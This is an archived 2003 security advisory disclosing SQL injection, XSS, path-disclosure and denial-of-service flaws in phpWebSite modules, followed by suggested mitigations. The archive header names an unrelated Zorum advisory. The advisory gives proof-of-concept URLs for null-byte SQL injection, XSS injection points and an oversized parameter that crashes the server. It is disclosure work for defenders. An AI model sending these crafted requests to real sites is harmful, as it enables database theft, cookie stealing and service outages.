Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:4981
HistoryAug 12, 2003 - 12:00 a.m.

ZH2003-22SA (security advisory): Zorum XSS Vulnerability and Path Disclosure

2003-08-1200:00:00
vulners.com
48

phpWebSite SQL Injection & DoS & XSS Vulnerabilities

PRODUCT: phpWebSite
VENDOR: Appalachian State University
VULNERABLE VERSIONS:

   - 0.9.x
   - 0.8.x
   - 0.7.x
   - And older versions.

NO VULNERABLE VERSIONS

  • ?

Description:

phpWebSite provides a complete web site content management system. Web-
based administration allows for easy maintenance of interactive,
community-driven web sites.


SECURITY HOLES FOUND and PROOFS OF CONCEPT:

I encountered SQL Injection vulnerabilities in some of the phpWebSite
modules , XSS ( Cross Site Scripting ) , Path Disclosures and a Denial
of Service attack.


| SQL |

INJECTION

I encountered SQL Injection vulnerabilities in the Calendar module ,
active in default configurations , that allows you
to execute SQL queries in the target server with the privileges of the
application user.

When you send a special-crafted command url to the Calendar script you
get a SQL error flag like this:


DB Error: syntax error
select * from mod_calendar_events where ((startDate >= 2003\0[CRAFTED
VALUE]0110 and startDate <= 2003\0[CRAFTED VALUE]0110) or
(endDate >= 2003\0[CRAFTED VALUE]0110 and endDate <= 2003\0[CRAFTED
VALUE]0110)) and active=1 [nativecode=1064
** You have an error in your SQL syntax near
'\0[CRAFTED VALUE]0110 and startDate <= 2003\0[CRAFTED VALUE]0110) or
(endDate >= 2003\0[CRAFTED VALUE]0110 and endDate ' at line 1]


This is an example error flag:


DB Error: syntax error
select * from mod_calendar_events where ((startDate >= 2003\0-10110 and
startDate <= 2003\0-10110) or
(endDate >= 2003\0-10110 and endDate <= 2003\0-10110)) and active=1
[nativecode=1064
** You have an error in your SQL syntax near
'\0-10110 and startDate <= 2003\0-10110) or (endDate >= 2003\0-10110
and endDate ' at line 1]


For get this you must use this simple url:

http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
=day&year=2003%00-1&month=

And you get the SQL Error flag. The error occurs when the query
includes the crafted value 2003[%00 = null]-1 .
You can design a successful query for get configuration values or
authentication data.
I desgined an url that makes a successful query ( no hostile query ) :

http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
=month&month=11&year=2003%20and%20startDate%20%3c%3d%2020071205%29%20or%
20%28%20endDate%20%3e%3d031101%20and%20endDate%20%3c%3d%2020071205%29%
29%20and%20active%3d1

it is ( without url encoding ) :

2003 and startDate <= 20071205) or ( endDate >=031101 and endDate <=
20071205)) and active=1

It is needed to have a little knowledge of SQL ( in this case , MySQL )
for make a successful attack.

Other scripts of the Calendar module are affected by this hole , when
you send a crafted request like a + symbol at critical url variable
value
you get the "pure" sql server error flag and you can imagine ( i like
this word ) a sql query for view private information of the application
by
looking at the error pages , like an try-error method.

Another urls for probe are:

http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
=day&month=0&year=<

http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
=day&month=1%00&year=)SQL_INJECTION_FAKU


| XSS |

vulnerabilities

I encountered XSS security holes in some scripts of phpWebSite :

http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
=day&month=2&year=2003&day=1+%00">[XSS ATTACK CODE]

http://[HOST]/[PATH]/index.php?module=fatcat&fatcat[user]
=viewCategory&fatcat_id=1%00+">[XSS ATTACK CODE]

http://[HOST]/[PATH]/index.php?
module=pagemaster&PAGE_user_op=view_page&PAGE_id=10">[XSS ATTACK CODE]
&MMN_position=[X:X]

http://[HOST]/[PATH]/index.php?
module=search&SEA_search_op=continue&PDA_limit=10">[XSS ATTACK CODE]

Note that the Calendar & PageMaster & Fatcat modules are affected
COMPLETLY and all the script variables that are passed by url are
affected too by this.

When you access a hostile link with a xss attack in those scripts youur
browser will execute the script commands.
This can be use for steal cookies , authentication tokens and other
private information.
If your browser is vulnerable to other holes ( like MSIE ;-) you can
have more problems…

XSS AT SQL ERRORS:

If you send a crafted url command with a XSS attack code to some of the
scripts that are vulnerable against sql injection vulnerabilities , the
xss attack code will be executed
in the error page.


| PATH |

DISCLOSURES

I tested this in a Win2K ( Windows 2000 Professional ) with SP3 and
versions:

  • Sambar Server 5.2 beta
  • PHP 4.2.3 running as ISPAI module
  • MySQL NT [normal service] 3.23.56
  • Include_Path to the pear folder of phpwebsite

Sending this:

http://127.0.0.1/index.php?module=calendar&calendar[view]
=month&month=11&year=9 # You can try other things and get the same #

you get this:

Warning: localtime(): invalid local time in
C:\ws\phpws\lib\pear\Date\TimeZone.php on line 252

Warning: localtime(): invalid local time in
C:\ws\phpws\lib\pear\Date\TimeZone.php on line 252

<- more than fifty repetitions of this warning ->

It is a strange error , i think that it only occurs in MSWindows
installations.
Possible it occurs when the Pear library TimeZone.php script tries to
convert the localdate in unix time stamp format.


| DENIAL OF |

SERVICE

There is a DoS/Buffer Overflow Attack in a script inside the Calendar
module that allows you to crash the host running
the MySQL server and the phpWebSite scripts ( must be the same
computer ).

This is a basic proof of concept for this vulnerability :

http://[HOST]/[PATH]/index.php?index.php?module=calendar&calendar[view]=
[VIEW FORM]&month=11&year=91+92+93…( more than 4000 bytes )

An attack like this causes a system global crash including the server
service and the mysql service.


SoLuTiOnS

1.- Be sure that the user of the phpWebSite database has only SELECT ,
INSERT and UPDATE privileges in only the phpWebSite
database.

2.- Use the php function eregi_replace for prevent XSS attacks.

3.- Turn php_error_flags to Off .

4.- Use in addition an external module if you are using apache like
mod_security .

5.- If you are paranoic don't use PHP , MySQL , Windows , Linux ,
computers , tcp/ip , netbios , games , asp ,
Apache… nothing !
WARNING ;-) : ( paranoic solution… )


CONTACT

Lorenzo Hernandez Garcia-Hierro
— Computer Security Analyzer —
–Nova Projects Professional Coding–
PGP: Keyfingerprint
B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2
ID: 0x9C38E1D7


www.novappc.com
security.novappc.com
www.lorenzohgh.com


NSRG-20-7